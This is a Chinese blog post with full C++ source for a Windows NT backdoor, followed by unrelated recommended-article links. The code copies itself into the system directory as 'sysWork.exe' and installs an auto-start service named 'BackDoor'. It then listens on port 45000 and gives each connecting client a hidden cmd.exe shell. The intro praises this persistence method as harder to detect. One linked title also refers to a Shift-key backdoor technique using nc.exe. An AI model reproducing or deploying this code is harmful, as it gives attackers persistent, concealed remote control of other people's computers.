简介

Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动映像劫持技术SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。

C++代码样例

//////////////////////////////////////////////////////////////

//

// FileName : ServiceAutoRunDemo.cpp

// Creator : PeterZ1997

// Date : 2018-5-4 23:19

// Comment : Create Service to make the BackDoor Run Automatically

//

//////////////////////////////////////////////////////////////

#include <iostream>

#include <WinSock2.h>

#include <winsock.h>

#include <windows.h>

#include <Winsvc.h>

#include <cstdio>

#include <cstring>

#pragma comment(lib, "ws2_32.lib")

using namespace std;

#define SERVICE_OP_ERROR -1

#define SERVICE_ALREADY_RUN -2

const unsigned int MAX_COUNT = 255; /// String Max Length

const DWORD PORT = 45000;           /// Listen Port

const unsigned int LINK_COUNT = 30; /// Max Link Number

SERVICE_STATUS g_ServiceStatus;

SERVICE_STATUS_HANDLE g_hServiceStatus;

/**

 * @brief CallBack Function to Translate Service Control Code

 * @param dwCode Service Control Code

 */

void WINAPI ServiceControl(DWORD dwCode)

{

	switch (dwCode)

	{

		//服务暂停

	case SERVICE_CONTROL_PAUSE:

		g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;

		break;

		//服务继续

	case SERVICE_CONTROL_CONTINUE:

		g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;

		break;

		//服务停止

	case SERVICE_CONTROL_STOP:

		g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;

		g_ServiceStatus.dwWin32ExitCode = 0;

		g_ServiceStatus.dwCheckPoint = 0;

		g_ServiceStatus.dwWaitHint = 0;

		break;

	case SERVICE_CONTROL_INTERROGATE:

		break;

	default:

		break;

	}

	//设置服务状态

	if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0)

	{

		printf("Set Service Status Error\n");

	}

	return;

}

/**

 * @brief Start Remote Shell

 * @lpParam the Client Handle

 */

DWORD WINAPI StartShell(LPVOID lpParam)

{

	STARTUPINFO si;

	PROCESS_INFORMATION pi;

	CHAR cmdline[MAX_COUNT] = { 0 };

	GetStartupInfo(&si);

	si.cb = sizeof(STARTUPINFO);

	si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)lpParam;

	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

	si.wShowWindow = SW_HIDE;

	GetSystemDirectory(cmdline, sizeof(cmdline));

	strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe");

	while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))

	{

		Sleep(100);

	}

	WaitForSingleObject(pi.hProcess, INFINITE);

	CloseHandle(pi.hProcess);

	CloseHandle(pi.hThread);

	return 0;

}

/**

 * @brief Service Running Function

 * @lpParam NULL

 */

DWORD WINAPI RunService(LPVOID lpParam)

{

	CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n";

	SOCKET sClient[30];

	DWORD dwThreadId[30];

	HANDLE hThread[30];

	WSADATA wsd;

	if (WSAStartup(0x0202, &wsd))

	{

		printf("WSAStartup Process Error\n");

		return 0;

	}

	SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

	sockaddr_in sin;

	sin.sin_family = AF_INET;

	sin.sin_port = htons(PORT);

	sin.sin_addr.S_un.S_addr = INADDR_ANY;

	if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin))) return 0;

	if (listen(sListen, LINK_COUNT)) return 0;

	for (int i = 0; i < LINK_COUNT; i++)

	{

		sClient[i] = accept(sListen, NULL, NULL);

		hThread[i] = CreateThread(NULL, 0, StartShell, (LPVOID)sClient[i], 0, &dwThreadId[i]);

		send(sClient[i], wMessage, strlen(wMessage), 0);

	}

	WaitForMultipleObjects(LINK_COUNT, hThread, TRUE, INFINITE);

	return 0;

}

/**

 * @brief the Main Function of the Service

 */

void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpArgv)

{

	HANDLE hThread;

	g_ServiceStatus.dwCheckPoint = 0;

	g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP;

	g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;

	g_ServiceStatus.dwServiceSpecificExitCode = 0;

	g_ServiceStatus.dwServiceType = SERVICE_WIN32;

	g_ServiceStatus.dwWaitHint = 0;

	g_ServiceStatus.dwWin32ExitCode = 0;

	g_hServiceStatus = RegisterServiceCtrlHandler("BackDoor", ServiceControl);

	if (!g_hServiceStatus)

	{

		printf("Register Service Error\n");

		return;

	}

	g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;

	g_ServiceStatus.dwCheckPoint = 0;

	g_ServiceStatus.dwWaitHint = 0;

	if (!SetServiceStatus(g_hServiceStatus, &g_ServiceStatus))

	{

		printf("Set ServiceStatus Error !\n");

		return;

	}

	hThread = CreateThread(NULL, 0, RunService, NULL, 0, NULL);

	if (!hThread)

	{

		printf("Create Thread Error\n");

	}

	return;

}

/**

 * @brief Install Service

 */

int APIENTRY InstallService()

{

	DWORD dwErrorCode;

	SC_HANDLE hscManager;

	SC_HANDLE hServiceHandle;

	SERVICE_STATUS ssServiceStatus;

	CHAR szSystemPath[MAX_COUNT] = "\0";

	CHAR szFileSelfPath[MAX_COUNT] = "\0";

	GetSystemDirectory(szSystemPath, sizeof(szSystemPath));

	GetModuleFileName(NULL, szFileSelfPath, sizeof(szFileSelfPath));

	strcat_s(szSystemPath, "\\sysWork.exe");

	CopyFile(szFileSelfPath, szSystemPath, true);

	hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

	if (!hscManager)

	{

		printf("Can not Open the Service Manager\n");

		return SERVICE_OP_ERROR;

	}

	printf("Service Manager Opened Success\n");

	hServiceHandle = CreateService(hscManager, "BackDoor", "BackDoor", SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, szSystemPath, NULL, NULL, NULL, NULL, NULL);

	if (!hServiceHandle)

	{

		dwErrorCode = GetLastError();

		if (dwErrorCode == ERROR_SERVICE_EXISTS)

		{

			hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);

			if (!hServiceHandle)

			{

				printf("Can not Create/Open Service\n");

				CloseServiceHandle(hServiceHandle);

				return SERVICE_OP_ERROR;

			}

			else

			{

				printf("Service Opened Success\n");

			}

		}

	}

	else {

		printf("Service Create Success\n");

	}

	if (!StartService(hServiceHandle, 0, NULL))

	{

		dwErrorCode = GetLastError();

		if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)

		{

			printf("SERVEICE IS ALREADY RUNNING\n");

			CloseServiceHandle(hServiceHandle);

			CloseServiceHandle(hscManager);

			return SERVICE_ALREADY_RUN;

		}

		else

		{

			printf("SERVEICE START ERROR\n");

			CloseServiceHandle(hServiceHandle);

			CloseServiceHandle(hscManager);

			return SERVICE_OP_ERROR;

		}

	}

	while (QueryServiceStatus(hServiceHandle, &ssServiceStatus))

	{

		if (ssServiceStatus.dwCurrentState == SERVICE_START_PENDING)

		{

			Sleep(100);

			continue;

		}

		if (ssServiceStatus.dwCurrentState != SERVICE_RUNNING)

		{

			printf("Service Start Process ERROR\n");

			CloseServiceHandle(hServiceHandle);

			CloseServiceHandle(hscManager);

			return SERVICE_OP_ERROR;

		}

		else

		{

			break;

		}

	}

	if (!QueryServiceStatus(hServiceHandle, &ssServiceStatus))

	{

		printf("Service Status Get Error\n");

		CloseServiceHandle(hServiceHandle);

		CloseServiceHandle(hscManager);

		return SERVICE_OP_ERROR;

	}

	printf("Service Start Success\n");

	CloseServiceHandle(hServiceHandle);

	CloseServiceHandle(hscManager);

	return 0;

}

/**

 * @brief Remove Service

 */

int RemoveService()

{

	SC_HANDLE hscManager;

	SC_HANDLE hServiceHandle;

	SERVICE_STATUS ssServiceStatus;

	hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

	if (!hscManager)

	{

		printf("Open Service Manager Error\n");

		return SERVICE_OP_ERROR;

	}

	printf("Open Service Manager Success\n");

	hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);

	if (!hServiceHandle)

	{

		printf("Open Service Error\n");

		return SERVICE_OP_ERROR;

	}

	printf("Open Service Success\n");

	if (QueryServiceStatus(hServiceHandle, &ssServiceStatus))

	{

		if (ssServiceStatus.dwCurrentState == SERVICE_RUNNING)

		{

			ControlService(hServiceHandle, SERVICE_CONTROL_STOP, &ssServiceStatus);

		}

	}

	else

	{

		printf("Service Status Get Error\n");

		CloseServiceHandle(hServiceHandle);

		CloseServiceHandle(hscManager);

		return SERVICE_OP_ERROR;

	}

	if (!DeleteService(hServiceHandle))

	{

		printf("Delete Service Error\n");

		CloseServiceHandle(hServiceHandle);

		CloseServiceHandle(hscManager);

		return SERVICE_OP_ERROR;

	}

	printf("Remove Service Success\n");

	CloseServiceHandle(hServiceHandle);

	CloseServiceHandle(hscManager);

	return 0;

}

/**

 * @brief main Function

 */

int main(int argc, char* argv[])

{

	SERVICE_TABLE_ENTRY svTable[] = {

		{(LPSTR)"BackDoor",ServiceMain},

		{NULL,NULL}

	};

	StartServiceCtrlDispatcher(svTable);

	if (argc == 2)

	{

		if (!stricmp(argv[1], "--install"))

		{

			if (InstallService() == SERVICE_OP_ERROR)

			{

				printf("[!]Service Operation Error\n");

			}

			else

			{

				printf("[*]Service Operation Success\n");

			}

		}

		else if (!stricmp(argv[1], "--remove"))

		{

			if (RemoveService() == SERVICE_OP_ERROR)

			{

				printf("[!]Service Operation Error\n");

			}

			else

			{

				printf("[*]Service Operation Success\n");

			}

		}

		else

		{

			printf("[Usage] => *.exe [--install]/[--remove]\n");

		}

	}

	else {

		printf("[Usage] => *.exe [--install]/[--remove]\n");

	}

	return 0;

}

安全之路 —— C/C++实现后门的服务自启动的更多相关文章

  1. SHIFT后门拿服务器之方法总结

    提权工具如下:cmd.exe Churrasco.exe nc.exe 提权前提:Wscript组件成功开启 如果Wscript组件被关闭,则使用以下方法开启: 源代码: <object run ...

  2. 物联网架构成长之路(22)-Docker练习之Etcd服务搭建

    0. 前言 时隔多日,前段时间忙完一个可有可无的项目后,又进入摸鱼时间,没有办法,非互联网公司,就是闲得蛋疼.又开始了自学之路.以前入门过Docker,然后又很久没有看了,最近重新看了一下,推荐一下这 ...

  3. Linux上天之路(十二)之服务管理

    主要内容 服务介绍 独立服务 非独立服务 1. 服务介绍 服务:常驻在内存中的程序,且可以提供一些系统或网络功能,那就是服务. 计算机中的系统服务有很多,比如: apache提供web服务 ftp提供 ...

  4. 物联网架构成长之路(30)-Spring Boot Admin微服务WebUI监控

    0. 前言 一个完整的微服务解决方案包含了许多微服务,基于我们需要观察各个微服务的运行状态,因此Spring Boot 生态提供了Spring Boot Admin 这个组件来实现微服务管理WEB U ...

  5. NET Core微服务之路:自己动手实现Rpc服务框架,基于DotEasy.Rpc服务框架的介绍和集成

    本篇内容属于非实用性(拿来即用)介绍,如对框架设计没兴趣的朋友,请略过. 快一个月没有写博文了,最近忙着两件事;    一:阅读刘墉先生的<说话的魅力>,以一种微妙的,你我大家都会经常遇见 ...

  6. 物联网架构成长之路(18)-接阿里云OSS服务

    1.申请/购买OSS服务 在阿里云上申请/购买OSS服务, 然后在会得AccessKeyID,AccessKeySecret,bucketName 这三个东西 2.增删改查 在pom.xml文件上增加 ...

  7. 物联网架构成长之路(23)-Docker练习之Elasticsearch服务搭建

    0. 前言 最近基本都是学一些环境配置,和一些中间件的安装与配置.没有实际编写代码.可能看起来有点水,我对自己的学习方式是,先要了解各个中间件的安装配置以及简单使用,理论应用场景,然后我在小项目中,逐 ...

  8. Kubernetes学习之路(十四)之服务发现Service

    一.Service的概念 运行在Pod中的应用是向客户端提供服务的守护进程,比如,nginx.tomcat.etcd等等,它们都是受控于控制器的资源对象,存在生命周期,我们知道Pod资源对象在自愿或非 ...

  9. MySQL学习之路1-Mac下启动连接MySQL服务

    MySQL简介 (MySQL是目前最流行的关系型数据库管理系统,现属于Oracle公司.) MySQL主要特点: 支持大型数据库,支持5000万条记录的数据仓库,32位系统表文件最大可支持4GB,64 ...

随机推荐

  1. shell脚本中打印所有匹配某些关键字符的行或前后各N行

    在日常运维中,经常需要监控某个进程,并打印某个进程的监控结果,通常需要打印匹配某个结果的行以及其前后各N行. 注意:echo使用-e参数,对打印的结果中进行\n换行 [root@mq-master02 ...

  2. python学习: 如何循序渐进学习Python语言

    大家都知道Python语言是一种新兴的编程语言.1989年,Python就由Guido van Rossum发明.Python一直发展态势很好. 原因有几点:1.跨平台性好.Linux.Windows ...

  3. 深入出不来nodejs源码-从fs.stat方法来看node架构

    node的源码分析还挺多的,不过像我这样愣头完全平铺源码做解析的貌似还没有,所以开个先例,从一个API来了解node的调用链. 首先上一张整体的图,网上翻到的,自己懒得画: 这里的层次结构十分的清晰, ...

  4. 深入出不来nodejs源码-内置模块引入初探

    重新审视了一下上一篇的内容,配合源码发现有些地方说的不太对,或者不太严谨. 主要是关于内置模块引入的问题,当时我是这样描述的: 需要关注的只要那个RegisterBuiltinModules方法,从名 ...

  5. WPF备忘录(1)有笑脸,有Popup

    1.画个笑脸给大家娱乐一下: <Canvas Width="200" Height="180" VerticalAlignment="Cente ...

  6. PetaPoco源代码学习--0.目录贴

    2017年3季度后,以人力外包的形式派驻到甲方单位进行项目救急时,接触到了甲方单位的ASP.NET MVC项目的ORM框架,它以PetaPoco(2012年的老版本)进行改造升级的,当初就想学习一下这 ...

  7. Java基础——ArrayList与LinkedList(一)

    一.定义 ArrayList和LinkedList是两个集合类,用于储存一系列的对象引用(references). 引用的格式分别为: ArrayList<String> list = n ...

  8. Android - AsyncTask你知道多少?

    http://www.cnblogs.com/qlky/p/5658070.html 为什么asyncTask最好在主线程初始化?在子线程怎么办? AsyncTask四个方法的执行顺序? mWorke ...

  9. IO流作业

    IO流作业 一.    填空题 Java IO流可以分为    字节流          和处理流两大类,其中前者处于IO操作的第一线,所有操作必须通过他们进行. 输入流的唯一目的是提供通往数据的通道 ...

  10. webstorm激活

    选择 License server http://idea.imsxm.com/ http://idea.iteblog.com/key.php (2016.11.16) http://v2mc.ne ...